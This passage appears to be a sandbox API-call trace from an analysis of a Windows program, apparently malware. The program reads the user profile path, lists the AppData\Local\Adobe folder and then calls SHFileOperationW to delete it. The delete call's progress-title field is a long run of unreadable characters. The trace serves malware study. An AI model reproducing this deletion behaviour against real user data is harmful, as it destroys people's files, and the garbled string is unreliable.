lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0153.042] CryptReleaseContext (hProv=0x9bec48, dwFlags=0x0) returned 1 [0153.042] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.042] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.042] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.042] FreeLibrary (hLibModule=0x76390000) returned 1 [0153.042] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.042] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.042] CloseHandle (hObject=0x4f0) returned 1 [0153.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.043] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.043] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0153.043] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0153.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0153.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0153.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0153.043] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Adobe", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpFilePart=0x8cedf4*="Adobe") returned 0x23 [0153.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d890 | out: hHeap=0x2af0000) returned 1 [0153.043] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\adobe")) returned 0x10 [0153.043] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e2078 [0153.044] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0153.044] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715a3e1e, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0153.044] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76e74ef1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x76e74ef1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="AcroCef", cAlternateFileName="")) returned 1 [0153.044] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x73de0392, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x73de0392, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Color", cAlternateFileName="")) returned 1 [0153.044] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x73de0392, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x73de0392, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Color", cAlternateFileName="")) returned 0 [0153.044] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0153.044] GetLastError () returned 0x12 [0153.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0153.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0153.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0153.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0153.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0153.044] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0153.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0153.044] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0153.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0153.045] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0153.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0153.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0153.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5da20 [0153.046] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Adobe", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpFilePart=0x8cf650*="Adobe") returned 0x23 [0153.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5da20 | out: hHeap=0x2af0000) returned 1 [0153.046] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\adobe")) returned 0x10 [0153.046] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥